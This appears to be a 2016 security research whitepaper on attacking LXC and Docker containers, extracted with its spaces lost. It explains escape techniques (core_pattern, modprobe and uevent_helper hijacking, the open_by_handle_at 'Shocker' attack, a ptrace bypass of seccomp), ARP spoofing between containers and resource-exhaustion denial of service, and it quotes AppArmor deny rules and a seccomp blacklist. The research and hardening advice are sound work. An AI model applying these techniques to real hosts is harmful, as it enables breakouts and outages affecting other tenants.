Copyright2016NCCGroupAnNCCGroupPublicationAbusingPrivilegedandUnprivilegedLinuxContainersPreparedby:JesseHertzNCCGroup|Page2Copyright2012NCCGroupContentsIntroduction3OverviewofContainerSecurity3Containersvs.
Virtualization.
3Namespaces3OtherContainer-RelevantLinuxSecurityFeatures.
4TheImportanceofAppArmor.
5MountOptions5UtilityChanges6DangerousPaths.
7TheImportanceofSeccomp8KernelManipulation8TheIssueWithopen_by_handle_at(8AbusingPrivilegedContainers.
9SYS_RAWIOAbuse9Theptrace()Hole.
9AbusingUnprivilegedContainers10PIDNamespacingInfo-Leak10NET_RAWabuse10DenialofServiceAttacks.
11Conclusion12Acknowledgements.
12FurtherReading.
12References13Appendix:PrivilegedLXCEscapePoC.
16Appendix:Cross-ContainerARPSpoofingWalkthrough.
20Appendix:DenialofServiceProof-of-ConceptCode.
23POSIXMessageQueues23PendingSignals.
24MaxProcesses25MaxFiles.
25DiskSpace.
27Appendix:/proc/bus/pciProof-of-ConceptCode.
28Environment.
28ExplanationofPoC30TheCode.
31NCCGroup|Page3Copyright2012NCCGroupIntroductionContainershavebecomeincreasinglyrelevanttodevelopersandsystemadministratorsforanumberoffunctions.
Theyareusedassecuritymeasurestoisolateprocesses,asdistributionmethodsforsoftwaretoguaranteereproducibility,asdevopstoolsfortestinganddeployingcode,andasbuildingblocksforanecosystemofdeveloper-orientedPlatform-as-a-Service(PaaS)products.
Thispaperwillexaminesomeofthesecuritymechanismsbehindcontainersandshowhowtheycanbeexploited.
AlthoughthefocusofthispaperwillprimarilybeLXC,andwilldiscussDocker,thispaperwilldemonstratemanytechniquesthatareapplicableacrossanyLinuxcontainersystembuiltonthesamefoundations.
OverviewofContainerSecurityContainersvs.
VirtualizationContainersofferanumberofadvantagesanddisadvantagescomparedtovirtualization.
Inmostvirtualizationapproaches,avirtualmachine(VM)image,representingvirtualizedfilesystemsandthestateofthemachine'smemory,isrunbythehost.
Todothis,thehostwhollyemulatesthehardwareprovidedtothevirtualmachine,sotheVMrunsasifitisonseparatehardware.
Incomparison,containersshareakernelwiththehostoperatingsystem,andthekernelisolatestheprocessesrunninginsidethecontainerusingvariousnamespaces.
Inthisway,processesrunninginsidethecontainerappeartorunonanisolatedLinuxhost,butinactualityarejust"namespaced"processesinsideasharedhost.
NamespacesManyLinuxnamespacefeaturesweredesignedwiththegoalofmakingcontainersystemsuseableandsecure[1][2].
Thekernelprovidesanumberofnamespaces[3]thatformthecoreofmoderncontainerizationsystems:IPCProvidesnamespacedversionsofSystemVIPCandPOSIXmessagequeues.
WhilekeepingtheseIPCmechanismsisolatedisimportanttosecureprocessesthatusethem,overalltheywon'tbeparticularlysecurityrelevantforthepurposesofthispaper.
Alatersectiondiscusses"DenialofServiceAttacks"againstthesesystems.
.
NetworkProvidesanamespacedandisolatednetworkstack.
Themajorityofcontaineruse-casesinvolvenetworkedservices,sothiswillprovetobeacorefeatureofcontainers.
Thesection"NET_RAWabuse"willexploreexploitingtypicalflawsincontainernetworking.
MountProvidesanamespacedviewofmountpoints.
Combinedwiththepivot_root(2)[4]syscall,thiswillbeusedtoisolatethecontainer'sfilesystemfromthehost'sfilesystem.
Thesection"TheIssueWithopen_by_handle_at()",willgooveraflawinthisimplementation,howitcanbeexploited,andhowthisexploitationispreventedinmoderncontainersystems.
PIDProvidesanamespacedtreeofprocessIDs(PIDs).
Thisallowseachcontainertohaveafullisolatedprocesstree,inwhichithasan'init'processthatitrunsasPID1insidethisnamespace.
ProcessesrunninginacontainerwillhaveadifferentPIDonthehostthantheydoinsidethecontainer'sPIDnamespace.
Avulnerabilitythatimpactsthisnamespacewillbecoveredin"PIDNamespacingInfo-Leak"laterinthispaper.
NCCGroup|Page4Copyright2016NCCGroupOtherContainer-RelevantLinuxSecurityFeaturesAnumberofotherLinuxkernelfeaturesareinvolvedinthesecurityofacontainersystem(especiallybefore/withoutusernamespaces):UserProvidesanamespacedversionofUserIDs(UIDs)andGroupIDs(GIDs).
Thisisoneofthemostimportantfeaturesofmoderncontainersystems,asitisusedtoprovide"unprivilegedcontainers".
Thesearecontainersinwhichroot(UID0)insidethecontainerisnotrootoutsidethecontainer,greatlyincreasingthecontainer'ssecurity.
Usernamespacesarearelativelylargeandnewkernelfeature,andhaveintroducednewvulnerabilitiesintheirinfancy[5].
TheyalsohavesomecontradictorydesigngoalswithLinuxcapabilities(notablythatauserreceivesafullsetofrootcapabilitiesintheirnewusernamespace[6]).
Itis,therefore,extremelyimportantthatsystemcallsandsecuritylogicbe"namespaceaware",ascheckingacapabilityinthewrongnamespaceleadstovulnerabilitiessuchasthe"CLONE_NEWUSER|CLONE_FS"rootexploit[5].
UsernamespacesprovideoneofthebedrocksofmodernLinuxcontainersystems,andaretheonlycontainerconfigurationthatLXCconsiderssecure[7].
InarecentreleaseofDockerEngine(1.
10),supportforusernamespaceshadbeenadded[8],althoughitisnotenabledbydefault.
Thesection"AbusingUnprivilegedContainers"willcoverwayscontainerscanbeexploitedevenwithusernamespacesenabled.
UTSProvidesanamespacedversionofsystemidentifiers.
Whilethisnamespaceisnotparticularlysecurityrelevant,itisquiteusefultoprovidecontainer-specifichostnames.
CgroupsCgroups[9](shortforcontrolgroups)provideahierarchicalinterfaceformanagingandmeteringresourcesanddeviceaccess.
Cgroupscanbeusedbyhigherprivilegedprocessestoputlimitsonlowerprivilegedprocesses'memoryusage,CPUusage,andblockdeviceIO.
Theycanalsobeusedinconjunctionwithiptablesinordertoprovidetrafficshaping.
Mostimportantly,theyareusedincontainersystemtocontrolaccesstodevices[10][11][12].
CapabilitiesLinuxcapabilities[13]wereintroducedasawaytobreaktheroleofrootdownintodiscretesubsections,whichcouldbegrantedtonon-rootprocessestoallowthemtoperformprivilegedactions.
Aprocesshasaconceptofa"permittedset"ofcapabilities,whichactsasalimitingsupersetforthecapabilitiesitcanhave.
Importantly,andbydefault,thisboundingsetiscarriedovertoanychildprocess,sothe"init"processofthecontainercreatesalimitingsetofcapabilitiesforallprocessesinsidethecontainer(asallprocessesdescendfromPID1).
Itisworthnotingthat,bydefault,Dockerdropsmanymorecapabilities[12]thanLXCdoes[14]forprivilegedcontainers.
MACLinuxSecurityModules(LSMs)[15]providesecurityhooksforMandatoryAccessControl(MAC)systems.
AppArmor[16]isthemostprevalentLSMincontainersystems,andisthesystemthispaperwilldiscuss.
AppArmorprofilescangreatlylimittheactionsthatagivenprogramcantake,aswellastakecomplexactionsonprocess-start(suchasperformingpivot_root()'s,andotherwisemanipulatingthemountnamespace).
BothLXCandDockership,andenablebydefault,profilestoestablishessentialsecuritybarriersanddefenseindepth(particularlyforprivilegedcontainers).
VulnerabilitiesthatwouldbepossiblewithoutAppArmor(orwithaweakprofile)willbeexploredinthesection"TheImportanceofAppArmor".
NCCGroup|Page5Copyright2016NCCGroupTheImportanceofAppArmorByexaminingsegmentsoftheAppArmorpolicyinusebyLXC,several"historical"(ortheoretical)containerbreakoutscanbeunderstood,providinginsightintotheneedforAppArmor(forthefullpolicies,see[22]forLXC,and[23]forDocker).
Dockerblocksmanyoftheseattacksbymounting/sysandpartsof/procasread-onlyfilesystems,ratherthan(orinadditionto)usingAppArmor.
Notethatwiththeadditionofusernamespaces,someofthesepolicieshavebecomedefense-in-depthmeasures,askernelnamespacesshouldpreventtheactionswithoutthepresenceofAppArmor(aslongasthecontainerhaslimitedcapabilitiesintherootusernamespace).
MountOptionsFirstuparetheAppArmorpoliciestoblockaccesstomountingdevptsfilesystems.
Asthecommentbelowstates,withoutthisthecontainercouldremount/dev/ptsandgetaccesstothehost'sterminals.
#thecontainermayneverbeallowedtomountdevpts.
Ifitdoes,it#willremountthehost'sdevpts.
Wecouldallowittodoitwith#thenewinstanceoption(but,rightnow,wedon't).
denymountfstype=devpts,Nextarepoliciestostopthecontainerfromattemptingtoremounttherootfilesystem.
Thisismainlydoneasadefense-in-depthmeasure.
#ignoreDENIEDmessageon/remountdenymountoptions=(ro,remount)->/,WhileAppArmorisnottheonlyLSMthatcanbeusedbycontainersystems(SELinuxisalsosupportedbyLXC[17]andDocker[18]),AppArmorisbyfarthemostwellsupportedanddocumented.
ItisthedefaultMACusedbybothLXCandDocker.
DuetothesimplicityoftheAppArmorsyntax,itisalsofareasiertousetocreatecustomized,per-containerprofiles.
SeccompSeccomp[19]isamechanismforsystemcallfiltering.
Seccomppoliciescomeintwoversions.
Inversionone,afilterisasmallsetofallowedsystemcallswhichcannotbecustomized,thisisalsoreferredtoasthe"Strict"mode.
Inversiontwo,"Filtermode",systemcallfiltersarewrittenasBerkeleyPacketFilter(BPF)programs.
Thisallowsmorefinely-grainedpoliciestobesetonsystemcallusage(withsomecaveats,seccomp-bpffilterscaninspectsyscallarguments,butcannotdereferencepointers[19]).
LXCcurrentlyusesarelativelysimplepolicy[20],whilethe1.
10releaseofDockerhasintroducedsupportforseccomp-bpf,aswellasprovidingafairlycomprehensiveexamplefilter[21].
NotethatonDocker1.
10,seccompisnotusedbydefaultontrusty(somewhatconfusingly,whenusingDocker1.
10onUbuntu15.
10,seccompisusedbydefault).
However,asofDocker1.
11.
1,seccompisnowusedbydefaultontrustyaswell.
Thesection"Theptrace(2)Hole"willdiscussbypassingseccomp.
NCCGroup|Page6Copyright2016NCCGroupdenymountoptions=(ro,remount,silent)->/,UtilityChangesThereareanumberofdangerousplacesin/procand/systhatallowtrivialcontainerescapes.
Allofthefollowinginvolvechangingthelocationofautility(suchasmodprobe)thatthehostwillcallwhencertaineventshappen(suchasakernelmoduleloadrequest).
Bychangingthistopointtoaprogramwithinourcontainer,anattackercanthencausethehosttorunanarbitrarypieceofcodeoutsidethecontainer.
LXCusesthefollowingrulesettoblocktheseattacks.
NotethisisnotanAppArmorprofile,itistheinputtoasmallpythonscript[24]whichgeneratesalongportionofAppArmorrules.
Thefullprofilegeneratedbythisisat[25].
#Runlxc-generate-aa-rules.
pyonthisfileafteranymodification,togenerate#thecontainer-rulesfilewhichisappendedtocontainer-base.
intocreatethe#finalabstractions/container-base.
block/sysallow/sys/fs/cgroup/**allow/sys/devices/virtual/net/**allow/sys/class/net/**block/proc/sysallow/proc/sys/kernel/shm*allow/proc/sys/kernel/sem*allow/proc/sys/kernel/msg*allow/proc/sys/kernel/hostnameallow/proc/sys/kernel/domainnameallow/proc/sys/net/**Sowhataretheimportantvectorsbeingblockeduevent_helper:ueventsareeventstriggeredbythekernelwhenadeviceisaddedorremoved[26].
Notably,thepathforthe"uevent_helper"canbemodifiedbywritingto"/sys/kernel/uevent_helper".
Then,whenaueventistriggered(whichcanalsobedonefromuserlandbywritingtofilessuchas"/sys/class/mem/null/event"),themaliciousuevent_helpergetsexecuted.
Anicewrite-upwithexamplecodeisavailableonline[27].
modprobe:modprobe[28]isauserlandutilityinvokedwhenthekernelneedstoloadakernelmodule.
Itslocationcanbechangedbymodifying"/proc/sys/kernel/modprobe"[29],andthencodeexecutioncanbegainedbyperforminganyactionwhichwilltriggerthekerneltoattempttoloadakernelmodule(suchasusingthecrypto-APItoloadacurrentlyunloadedcrypto-module,orusingifconfigtoloadanetworkingmoduleforadevicenotcurrentlyused).
core_pattern:core_patternsareusuallyusedtotellthekernelhowtonameandformatthecoredumpsthatareproducedwhenaprogramcrashes.
However,theycontainaterrificfeature[30]:"Sincekernel2.
6.
19,Linuxsupportsanalternatesyntaxforthe/proc/sys/kernel/core_patternfile.
Ifthefirstcharacterofthisfileisapipesymbol(|),thentheremainderofthelineisinterpretedasaprogramtobeexecuted.
Insteadofbeingwrittentoadiskfile,thecoredumpisgivenasstandardinputtotheprogram.
"Usingthis,acore_patterncanbespecifiedthatinvokesaprogramofourchoice,andthentotriggeritsusage,youonlyneedtohaveaprogramcrash.
NCCGroup|Page7Copyright2016NCCGroup/proc/sys/vm/panic_on_oom:ThisisaglobalflagthatdetermineswhetherthekernelwillpanicwhenanOutofMemory(OOM)conditionishit(ratherthaninvokingtheOOMkiller).
Thisopensuparelativelysimpledenial-of-serviceattack.
DangerousPaths#blocksomeotherdangerouspathsdeny@{PROC}/kcorerwklx,deny@{PROC}/kmemrwklx,deny@{PROC}/memrwklx,deny@{PROC}/sysrq-triggerrwklx,kcore:kcoreprovidesafulldumpofthephysicalmemoryofthesysteminthecorefileformat[31].
Itdoesnotallowwritingtosaidmemory.
Accesstothisallowsacontainertotriviallyreadallofhostmemory.
kmem:/proc/kmemisanalternateinterfacefor/dev/kmem[32](directaccesstowhichisblockedbythecgroupdevicewhitelist),whichisacharacterdevicefilerepresentingkernelvirtualmemory.
Itallowsbothreadingandwriting,allowingdirectmodificationofkernelmemory.
mem:/proc/memisanalternateinterfacefor/dev/mem[32](directaccesstowhichisblockedbythecgroupdevicewhitelist),whichisacharacterdevicefilerepresentingphysicalmemoryofthesystem.
Itallowsbothreadingandwriting,allowingmodificationofallmemory.
(Itrequiresslightlymorefinessethankmem,asvirtualaddressesneedtoberesolvedtophysicaladdressesfirst).
sysrq-trigger:WritingtothisspecialfileallowssendingSystemRequestKeycommands[33],whichallowanumberofprivilegedactions,suchaskillingprocesses,listingallprocessesonthesystem,ortriggeringhostreboot[34].
Thefinalimportantsectionblockswritestoseveraldifferentplaceswhichcouldbedangerous:#denywritesin/sysexceptfor/sys/fs/cgroup,alsoallow#fusectl,securityfsanddebugfstobemountedthere(read-only)denymountfstype=debugfs->/var/lib/ureadahead/debugfs/,deny/sys/firmware/efi/efivars/**rwklx,deny/sys/kernel/security/**rwklx,deny@{PROC}/sys/fs/**wklx,debugfs:debugfsprovidesa"norules"interfacebywhichthekernel(orkernelmodules)cancreatedebugginginterfacesaccessibletouserland[35].
Ithashadanumberofsecurityissuesinthepast[36],andthe"norules"guidelinesbehindthefilesystemhaveoftenclashedwithsecurityconstraints[37].
InsideanLXCcontainer,itismountedread-only.
/sys/firmware/efi/efivars:efivarsprovidesaninterfacetowritetotheNVRAMusedforUEFIbootarguments[38].
Modifyingthemcanrenderthehostmachineunbootable(andhasinsomerecentsystems[39].
/sys/kernel/security:Mountedhereisthesecurityfsinterface,whichallowsconfigurationofLinuxSecurityModules[40].
Mostrelevantforourpurposes,thisallowsconfigurationofAppArmorpolicies[41],andsoaccesstothismayallowacontainertodisableitsMACsystem.
/proc/sys/fs:FromtheRedHatmanpages[42]:"Thisdirectorycontainsanarrayofoptionsandinformationconcerningvariousaspectsofthefilesystem,includingquota,filehandle,inode,anddentryinformation.
"Writeaccesstothisdirectorywouldallowvariousdenial-of-serviceattacksagainstthehost.
NCCGroup|Page8Copyright2016NCCGroupTheImportanceofSeccompSeccomp-BPFallowsforconfigurablefilteringofdangeroussystemcalls.
Forseveralversionsnow,LXChasshippedwithaverysmallandsimpleseccomppolicy[20],whichisillustratedbelow.
WiththeDocker1.
10release,Dockerintroducedamuchmorecomplexpolicy[21](whichisusedbydefaultoncertainplatformsin1.
10,andbydefaultontrustyaswellin1.
11.
1).
2blacklistreject_force_umount#commentthistoallowumount-f;notrecommended[all]kexec_loaderrno1open_by_handle_aterrno1init_moduleerrno1finit_moduleerrno1delete_moduleerrno1ThefirstpieceoftheLXCpolicyisintendedasadefenseindepthmeasuretostopcontainersfromforciblyunmountingpiecesoftheirfilesystem,whichmayhavesecurityconsequences.
Themoreinterestingsectionistheblacklistingofcertaindangeroussyscalls:KernelManipulationSeveralsystemcallswhichallowmanipulatingkernelmodulesarebanned(init_module(2),finit_module(2),anddelete_module(2)),aswellaskexec_load(2),whichallowsreplacingthecurrentlyrunningkernelwithanewkernelimage.
Notethatthereissomedefenseindepthagainstexploitingtheseinprivilegedcontainers:init_module(2)[43],finit_module(2)[44]anddelete_module(2)[45]:TheseallrequiretheSYS_MODULEcapability,whichisdroppedbyDockerandLXCinprivilegedcontainers.
kexec_load(2)[46]:kexec_load(2)doesnotrequireSYS_MODULE.
Instead,itrequiresSYS_BOOT,whichprivilegedLXCcontainersretain.
Inmostsituations,thisisn'texploitable(withoutbypassingseccomp),howeveritisworthnotingLinux3.
17introducedanewkexecvariant:kexec_file_load(2)[46].
Thiscall(meantforloadingsignedkernels)isnotontheseccompblacklistforaprivilegedLXCcontainer,andonlyrequiresSYS_BOOT.
However,privilegedLXCcontainershaveanumberofotherissuesallowingreliablecontainerescapewithoutneedingtobootintoanewkernel(sincewecaninfactbypassseccomp!
Fortheeagerreader,feelfreetoheadrightto'Theptrace(2)Hole'and'Appendix:PrivilegedLXCEscapePoC').
TheIssueWithopen_by_handle_at()open_by_handle_at(2)[47]isaninterestingsystemcall.
Itwasoriginallyintroducedintothekerneltosupportuserspacefileservers.
Thiswasdesiredsothatprocessescouldeasilypassuniquefileidentifiersbetweeneachother,ratherthanpassfiledescriptorsoverUnixDomainSockets.
However,open_by_handle_at(2)isasecuritynightmare.
AnyprocesswiththecapabilityDAC_READ_SEARCHcanuseopen_by_handle_at(2)togainaccesstoanyfile,evenfilesoutsidetheirmountnamespace.
Thehandlepassedintoopen_by_handle_at(2)isintendedtobeanopaqueidentifierretrievedusingname_to_handle_at(2)[47].
However,thishandlecontainssensitiveandtamperableinformation,suchasinodenumbers.
ThiswasfirstshowntobeanissueinDockercontainersbySebastianKrahmer[48](andbrandedas"Shocker").
Atthetimeofitsrelease,thisaffectedbothLXCandDocker(whichwasatthetimepoweredbyLXC).
ItalsowasanissueinOpenVZ[49](anothercontainersystemthathasdeclinedinpopularity).
DockerhasNCCGroup|Page9Copyright2016NCCGroupmitigatedthisissuebydroppingDAC_READ_SEARCH(aswellasblockingaccesstoopen_by_handle_atusingseccomp).
LXCmitigatesthisissuebyusingusingusernamespaces,andalsobydefaultblocksthissystemcallthroughseccomp.
ThisseccomppolicycanbedisabledinbothprivilegedandunprivilegedLXCcontainersusing"Theptrace(2)Hole",socautioususersareadvisedtoconfiguretheirunprivilegedLXCcontainerstoalsodropDAC_READ_SEARCH(andperhapsSYS_PTRACE).
Foragreatwrite-uponhowthe"Shocker"exploitworks,see[50].
In"Appendix:PrivilegedLXCEscapePoC",thesemitigationsarediscussedinabitmoredetail,andcodeisprovidedtoescapeaprivilegedLXCcontainerbyusingptrace(2)tobypassseccompandthenabusingopen_by_handle_at(2).
AbusingPrivilegedContainersSYS_RAWIOAbuseFromananalysisofcapabilitiesnotdroppedbydefaultinsideprivilegedLXCcontainers,SYS_RAWIOstoodoutasabusable,sinceitisusedalloverthekernelinanumberofsecuritysensitivecontexts.
ThisledtheauthortothediscoveryofacontainerescapeonLXCprivilegedcontainers[51],whichwasdisclosedtotheLXCteam,whothenaddedasecuritypagetotheirsite[7]inordertoclarifythatprivilegedcontainersarenotconsideredsecure.
NewerversionsofLXCnowalsodropSYS_RAWIOandhaveadditionalAppArmorrulestoblockaccessto/proc/bus.
Fromwithinacontainer,itispossibletoaccessthe"controlregions"ofdevicesattachedtothehostPCIbusbyusingthe/proc/bus/pci/interface.
Accesstothis/proc/interfacerequirestheSYS_RAWIOcapability.
Evenifthispathin/procwasblockedthroughAppArmor,acontainerwithSYS_RAWIOcouldstillaccessthisinterfacethroughtheiopl(2)/ioperm(2)syscalls(andthenusinginb(2),outb(2)andfriends[52][53]toaccesstheIOports).
NotethatDockerisnotvulnerabletothis,since(asidefromlimitedportions),/procistypicallymountedread-only,andSYS_RAWIOisdropped.
ForproofofconceptcodeusingthistosendrawAHCIcommandstothehard-disk,seeAppendix:/proc/bus/pci.
Intheresponsetothisbug,theLXCteamcommentedthattheyconsiderLXCprivilegedcontainersinherentlyunsafe,asthereisaknownand"unfixable"holeinLXC'sprivilegedcontainers,involvingptrace(2)tobypassseccomp(alsoaknownseccomplimitation,asdiscussedbelow).
Theptrace(2)HoleUnfortunately,documentationonusingptrace(2)tobypassseccompisrathersparse.
It'smentionedinpassinginakernelmailinglistthread[54],butperhapsthemostdefinitivereferenceisthissectionofthekernelseccompdocumentation[55]discussingusingptrace(2)toinspectsystemcalls:Theseccompcheckwillnotberunagainafterthetracerisnotified.
(Thismeansthatseccomp-basedsandboxesMUSTNOTallowuseofptrace,evenofothersandboxedprocesses,withoutextremecare;ptracerscanusethismechanismtoescape.
)The"vulnerability"itselfisasimpleTime-of-Check-to-Time-of-Use(TOCTTOU)issue:seccompfilteringisappliedbeforethetracerisnotified(andbeforethesyscallisactuallytriggered),sothetracermaymodifytheregistersusedinthesystemcall(aftertheyhavebeeninspectedbyseccomp)toturnwhatwasabenignsystemcallintoamaliciousone.
AcleardemonstrationofthisisinJannHorn'sproof-of-conceptcodeforbypassingaseccomppolicyusingptrace(2)[56].
In"Appendix:PrivilegedLXCEscapePoC",you'llfindafullproof-of-conceptforanLXCprivilegedcontainerescape,usingtheptrace(2)holetobypassseccomp,andthenopen_by_handle_at(2)inordertoescapethecontainer.
Interestingly,thewayDockermitigatesthisissueissimplytoNCCGroup|Page10Copyright2016NCCGroupdisallowusingptrace(2)insidecontainers(bydroppingSYS_PTRACEbydefault).
WhileseccompcanbedisabledusingptraceinLXCunprivilegedcontainers,abusingopen_by_handle_at(2)willfail,sincethecontainedprocesslacksDAC_READ_SEARCHintherootnamespace(see"Appendix:PrivilegedLXCEscapePoC"foraslightlymorein-depthexplanation).
WiththerecentadditionofusernamespacestoDocker,itispossiblethatptrace(2)willbeallowedinsideDockercontainersinthefuture(althoughunlikely,giventheirrecentfocusonseccomp[8]).
DespiteLXCprivilegedcontainersbeinginherentlyunsafe,inthisauthor'sopinion,findingprivilegedcontainerbreakoutscanbeafunexercise(andoftentheycanmakeprivilegedcontainersslightlymoresafe:e.
g.
afterreportingthe/proc/bus/issue,newAppArmorruleswereaddedandRAW_SYSIOwasdroppedbydefault).
Sotoanyinterestedreaders,goforthandhunt!
I'dlovetohearaboutwhatyoufind.
AbusingUnprivilegedContainersThefollowingsectioncoverssomeknownweaknessesinunprivilegedcontainers,alongwithdemonstrationsonhowtheycanbeexploited.
ThefollowingtestswereperformedonadefaultDocker1.
10setup[57](which,ontrusty,doesnotuseusernamespacesorseccompbydefault),aswellasonadefaultLXC1.
08setup[58](whichdoesusebothusernamespacesandseccompbydefault)onadefaultVagrantUbuntuTrusty64VM.
WhileDockercontainersstartedthiswayarenotunprivileged,allthefollowingattackswerefoundonanunprivilegedLXCcontainer,andthenverifiedtoworkin(default,privileged)Dockeraswell.
PIDNamespacingInfo-LeakWhileexploringunprivilegedcontainers,theauthordiscoveredaninterestinginfo-leak:the'/proc/sched_debug'file.
Thispseudo-fileallowsanunprivilegedusertoviewdebuginformationfortheLinuxscheduler,andisnotPID-namespaceaware.
Assuch,itdisclosesthenamesandPIDsofallprocessesrunningonthesystem(andevenwhattheirtaskgroup(cgroup)is,makingiteasytoidentifyothercontainersonthesystemandwhatcontainersystemisinplace).
Theauthorreportedthisinfo-leaktobothDockerandLXC,anditwasthenpatchedinDocker[59].
Whilethenexttwoissueshavebeendocumentedbeforebyotherresearchers,theyrepresentsubtlyinsecuredefaultswithlargeimpacts,andsotheauthorbelievestheymeritfurtherdiscussion.
Onapositivenote,inresponsetodisclosingtheseissuestotheLXCteam,theywillbeupdatingtheirsecuritypagetomentiontheseissues[60],whichshouldhopefullybringthemtotheattentionofmoredevelopersandadministratorsusingLXC.
NET_RAWabuseAcommonconfigurationforcompaniesofferingPaaSsolutionsbuiltoncontainersistohavemultiplecustomers'containersrunningonthesamephysicalhost.
Bydefault,bothLXCandDockersetupcontainernetworkingsothatallcontainerssharethesameLinuxvirtualbridge.
Thesecontainerswillbeabletocommunicatewitheachother.
Evenifthisdirectnetworkaccessisdisabled(usingthe–icc=falseflagforDocker,orusingiptablesrulesforLXC),containersaren'trestrictedforlink-layertraffic.
Inparticular,itispossible(andinfactquiteeasy)toconductanARPspoofingattackonanothercontainerwithinthesamehostsystem,allowingfullmiddle-personattacksofthetargetedcontainer'straffic.
Afullwalkthroughofthisattackispresentin"Appendix:Cross-ContainerARPSpoofingWalkthrough".
TheauthorreportedthisissuetobothLXCandDocker[61][62].
Asreferencedintheresponsestothebugreport,thisisnotaparticularlynewissue.
IthasbeendocumentedinbothLXC[63][64][65]andDocker[66][67][68],aswellasinotherproductssuchasOpenSwitch[69],andinOpenStackNeutron,whereitwaspreviouslyanissue[70]andthenfixed[71].
TheLXCteamrecommendsanumberofsolutions[61],including:UsingLXDwithOpenStacktomanagecontainernetworkingUsinglibvirttomanagetheMACtablesofbridges/containersNCCGroup|Page11Copyright2016NCCGroupUsingaseparatevirtualbridgepertrustzoneorpercontainerTheDockerteamsimplyrecommendsdroppingNET_RAW[62].
DenialofServiceAttacksUsernamespacesworkby"sliding"UIDsbetweentheusernamespace(thecontainer)andtherootnamespace(thehost).
Forexample,onadefaultLXCinstall,UID0insidethecontainerbecomesUID100000onthehost.
However,thedefaultacrossbothLXCandDockeristousethesameUIDslideforallunprivilegedcontainers.
Inotherwords:identicalUIDsofprocessesinsidedifferentcontainerswilltranslatetoidenticalhostUIDs,justshiftedupbyaconstantslide(i.
e.
allprocessesrunningasrootinsideanycontainerarerunningwithUID`100000`onthehost).
Thisconditionraisesthepossibilityofper-userulimitsbeinghit,sincetheseareasofthekernelarenotusernamespaceaware.
Notethatthesesamedenial-of-service(DoS)conditionsoccurwithoutusernamespacesaswell(asthesameconditionofsharedhostUIDsapplies).
ExamplesdemonstratingtheseissuesareavailableinAppendix:DenialofServiceProofs-of-ConceptCode.
PendingSignals:Thisisaper-userlimitonthemaximumnumberofpendingsignalsthatcanbequeuedamongallausers'processes.
Aprocessrunninginonecontainercanqueueupthemaximumnumberofpendingsignals,preventingprocessesinothercontainersfromreceivingpendingsignals.
Fromtesting,thisaffectedbothLXCandDocker.
PosixMessageQueues:ThislimitsthemaximumamountofkernelresourcesthatcanbeusedonPOSIXmessagequeues.
AprocessrunningononecontainercanexhaustallavailablePOSIXmessagequeuememory,preventingprocessesinothercontainersfromcreating,orsendingmessagesto,POSIXmessagequeues.
Fromtesting,thisworkedonLXCandDocker.
MaxUserProcesses:Thisisaper-userlimitonthemaximumnumberofprocesses.
ThiscaneasilybeexploitedtocreateasimpleDoSagainstothercontainers,aswellas(sometimes)thehost.
Fromtesting,thisattackwasverysuccessfulonLXC(andwasabletobringdownmywholehost),whileonDockerwasonlywasabletobringdownallDockercontainers(thehostremainedstable).
NotethatLinux4.
3hasaddedtheabilitytolimitPIDresourcesthroughcgroups[72][73],whichshouldmakeiteasierforcontainersystemstomitigatethisissue.
MaxFiles:Thisisaper-userlimitonthemaximumnumberoffiledescriptorsthatcanbeopen.
OnbothLXCandDocker,thisisaneasywaytoDoSothercontainersrunningonthesamehost.
Forgoingulimits,twootherDoSconditionsareoftenexploitableincontainersystems:DiskSpace:Perhaps(asidefromaforkbomb)thesimplestDoSagainstcontainersystemsistofillupdiskspace.
Fromtesting,thisworkedonLXCandDocker.
UnlikesomeoftheotherDoSattackspresentedhere,whichmayoftenbringdownthehostorintroduceenoughinstabilitytomakethemselvesdifficulttocleanup,thisoneoffersthesimplestabilitytocreateaDoSandthencleanitupquickly.
CombinedwiththePIDNamespacingInfo-Leak,thiscouldallowanattackercontainertotargetothertenantsonasharedhost,selectivelycreatingDoSconditionsonlywhencertainothercontainersorprocesseswererunning.
GlobalFileDescriptorLimits:Thesystemmaintainsalimitonthemaximumnumberoffiledescriptorsavailableoverall(availableat/proc/sys/fs/file-max,whichaswasdiscussedearlier,containerscannotwriteto).
IfcontainersarenotsharingaUIDmap,andhaveaulimitsetonthenumberoffiledescriptorstheycanopen,acontainercanstillattempttoDoSthehost(andothercontainers)byopeningthemaximumnumberofFDsallowedaseachuserinitsusernamespace,providingagreatlyamplifiedabilitytoconsumeFDs.
Thisisgenerallya"lastline"DoS,andwouldonlybeattemptedifmitigationsforother(simpler)vectorsareputinplace.
NCCGroup|Page12Copyright2016NCCGroupConclusionContainersystemsarerapidlyimprovingtheirsecurity,and,withtheireaseofusefordevelopers,don'tappeartobegoingawayanytimesoon.
BothLXCandDockerofferproductsthat(whenusedcorrectly)providereasonablystrongsecurityandisolationforpotentiallyhostileorcompromisedapplications.
However,neitherofthemissecurewithoutproperconfiguration,especiallyinenvironmentswheremultipletenantsarerunningonthesamehost,andsogreatcareneedstobetakentosecureandauditcontainersystems.
NewproductssuchasLXD[74],OpenStack[75],andKubernetes[76]areattemptingtoprovide"full"solutionsformanagingandsecuringcontainers.
Comingfromadifferentangle,Intel'sClearContainer[77][78]projectaimstomixhardwarevirtualizationwithcontainers,improvingspeed,andeliminatingtheneedforasharedkernel,throughminimalhypervisors.
Asthesesystemscontinuetoevolve,itseemslikelythattherewillbebothgreatlyimprovedbase-hardening,aswellasgreatlyexpandedattacksurfaces,sothefutureofcontainersecurityisnothingifnotinteresting.
AcknowledgementsI'dliketothankTimNewshamforthecodeinAppendix:PrivilegedLXCEscapePoC,AaronAdamsforcodeAppendix:/proc/bus/pci,AaronGrattafioriforhishelpwithreviewingcontent,JeffDileoforpointingouthowtocombineDoSandInfoleakstocausegreathavoc,andJakeHeath,JackLeadford,JustinEngler,andJeremiahBlatzfortheir(heroic)effortsincopyeditingmybrainmushintoacoherentpaper.
AppendixCodeAsmanyoftheappendicescontainlongcodesegments,allcodeintheappendiceshasbeenpackagedinaseparatetarballforthereader'sconvenience,availablehere:XXX.
FurtherReadingIhighlyrecommendthefollowing(innoparticularorder)forbothunderstandingcontainersandcontainersecurity:http://www.
slideshare.
net/jpetazzo/anatomy-of-a-container-namespaces-cgroups-some-filesystem-magic-linuxconhttps://lwn.
net/Articles/531114/http://www.
haifux.
org/lectures/299/netLec7.
pdfhttps://www.
stgraber.
org/2013/12/20/lxc-1-0-blog-post-series/https://major.
io/wp-content/uploads/2015/08/Securing-Linux-Containers-GCUX-Gold-Paper-Major-Hayden.
pdfhttp://arxiv.
org/pdf/1501.
02967.
pdfhttps://www.
nccgroup.
